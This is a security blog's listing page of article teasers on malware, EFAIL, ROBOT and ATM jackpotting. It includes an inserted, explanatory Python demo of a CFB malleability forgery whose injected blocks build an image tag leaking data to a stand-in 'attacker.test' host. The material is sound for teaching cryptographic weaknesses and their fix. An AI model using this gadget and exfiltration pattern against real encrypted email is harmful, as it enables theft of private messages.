
Beautifying the webinjects of Gootkit

At first glance, Gootkit's webinjects may look like a messy blob of binary data, but there is an easy way to decode them neatly in a matter of seconds. In this short article…

Read more

EFAIL: Malleability in symmetric cipher systems

In the previous post about EFAIL (https://www.s21sec.com/en/blog/2018/05/8326/) we discussed the risk that arises from PGP using a "malleable" encryption mode. But what does this mean? In this post we will see how this "malleability" allows the creation of fake…
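Added example, not code from the S21sec post: a CFB-mode malleability gadget of the kind EFAIL exploits, written in Python with the standard library only. The block cipher is replaced by a keyed PRF stand-in (an assumption of this example; CFB uses only the cipher's forward direction, so the gadget does not depend on which cipher is used), and the attacker is assumed to know a single plaintext block, here the MIME header prefix, which is the assumption the real attack relies on. Key, IV, message and injected blocks are constructed sample values.

```python
import hashlib
import hmac

BLOCK = 16  # block size in bytes


def block_encrypt(key: bytes, block: bytes) -> bytes:
    """Stand-in for the block cipher's forward direction (assumption of this
    example: a keyed PRF truncated to one block). CFB never needs the inverse,
    so the gadget below works unchanged for any block cipher run in CFB mode."""
    return hmac.new(key, block, hashlib.sha256).digest()[:BLOCK]


def xor(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def cfb_encrypt(key: bytes, iv: bytes, plaintext: bytes) -> bytes:
    """CFB encryption: C_i = E(C_{i-1}) XOR P_i, with C_{-1} = IV."""
    if len(plaintext) % BLOCK:
        raise ValueError("this example handles whole blocks only")
    out, prev = [], iv
    for i in range(0, len(plaintext), BLOCK):
        c = xor(block_encrypt(key, prev), plaintext[i:i + BLOCK])
        out.append(c)
        prev = c
    return b"".join(out)


def cfb_decrypt(key: bytes, iv: bytes, ciphertext: bytes) -> bytes:
    """CFB decryption: P_i = E(C_{i-1}) XOR C_i. Only an XOR separates C_i
    from P_i, which is exactly the malleability the gadget abuses."""
    out, prev = [], iv
    for i in range(0, len(ciphertext), BLOCK):
        c = ciphertext[i:i + BLOCK]
        out.append(xor(block_encrypt(key, prev), c))
        prev = c
    return b"".join(out)


def cfb_gadget(c_prev: bytes, c_i: bytes, known_p_i: bytes, chosen: bytes) -> bytes:
    """Attacker side, no key involved. Because P_i = E(C_{i-1}) XOR C_i and
    P_i is known, the pair (C_{i-1}, C_i XOR P_i XOR chosen) decrypts to
    (<one block of unpredictable bytes>, chosen)."""
    return c_prev + xor(c_i, xor(known_p_i, chosen))


def forge(iv: bytes, ciphertext: bytes, known_p0: bytes, chosen_blocks) -> bytes:
    """Chain gadgets built from the first pair (IV, C_0), whose plaintext P_0 is
    known. Each chosen block lands at an odd block index; the even indices hold
    garbage the attacker has to tolerate (e.g. inside an HTML attribute)."""
    c0 = ciphertext[:BLOCK]
    return b"".join(cfb_gadget(iv, c0, known_p0, ch) for ch in chosen_blocks)


# Constructed sample values, not taken from any real message.
KEY = b"victim-secret-key"
IV = bytes(BLOCK)
MESSAGE = b"Content-Type: multipart/signed; "  # 32 bytes, two blocks
CHOSEN = [b'<img src="http:/', b"/attacker.test/?"]  # 16 bytes each


def demo():
    """Encrypt honestly, forge without the key, decrypt with the key, and
    return the recovered plaintext split into blocks."""
    ct = cfb_encrypt(KEY, IV, MESSAGE)
    known_p0 = MESSAGE[:BLOCK]  # attacker guesses the MIME header prefix
    forged = forge(IV, ct, known_p0, CHOSEN)
    pt = cfb_decrypt(KEY, IV, forged)
    return [pt[i:i + BLOCK] for i in range(0, len(pt), BLOCK)]


if __name__ == "__main__":
    for i, blk in enumerate(demo()):
        print(i, blk)
```

Blocks 1 and 3 of the decrypted output are exactly the attacker's chosen text; blocks 0 and 2 are unpredictable. The forgery never touches the key, which is why authenticated encryption (or at least checking an integrity tag before any plaintext is released) is the fix rather than a stronger block cipher.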

Read more

EFAIL – Is PGP really dead?

A vulnerability affecting PGP and S/MIME, the two mechanisms commonly used for email encryption, has recently been published (https://efail.de/). As a mitigation, it has been recommended to disable the message decryption plugins installed in email clients, and…

Read more

First year of the COMPACT Project

Hacker-themed films tend to focus on threats against nation-wide organizations, such as military infrastructure, intelligence and counter-intelligence agencies, or huge hydroelectric power plants whose failure threatens to flood thousands of square kilometres and affect millions of people. Of…

Read more

Solving the ROBOT CTF

After the publication of the previous post on ROBOT (https://www.s21sec.com/en/blog/2017/12/robot-bleichenbacher-returns/), some people wanted to see a proof of concept of the attack, so I started developing a set of tools that demonstrate an attack using a Bleichenbacher oracle. After a…

Read more

ATM Jackpotting attacks reach the U.S.A

ATM operators in the U.S.A. have started 2018 with a new headache, as recent news reports show that ATM Jackpotting (a cyber-criminal technique already widespread across LATAM, Asia and Europe) has…

Read more

ROBOT: Bleichenbacher returns

"Those who do not remember the past are condemned to repeat it" (George Santayana). Some days ago, a new vulnerability known as ROBOT, affecting some SSL/TLS implementations, was published. The acronym stands for "Return Of Bleichenbacher's Oracle Threat".…

Read more

COBALT ATTACKS IN THE WILD

Recently, our analyst team came across a suspicious email from a Russian sender with the following details: Subject: Блокировка интернет ресурса (Blocking of an internet resource) Sender: info@roskomnadzor.info Attached file: Wire problems.doc The Microsoft Word document (MD5: c2c753f440314d1ec88c1569aa845ac2) was in fact a Microsoft Office RTF…

Read more

Androkins hits Colombia

A few weeks ago we wrote about Androkins (1). Since then we have been actively monitoring Androkins activity, and we periodically see more and more botnets added to the list. Androkins botnets have an internal name which can…

Read more

Ramnit and its Pony module

In our automatic malware analysis tool we have just noticed something odd. When a Ramnit sample entered our sandbox, activity of the Pony password-stealing trojan was sometimes flagged as well. Since Pony can act as a downloader and can…

Read more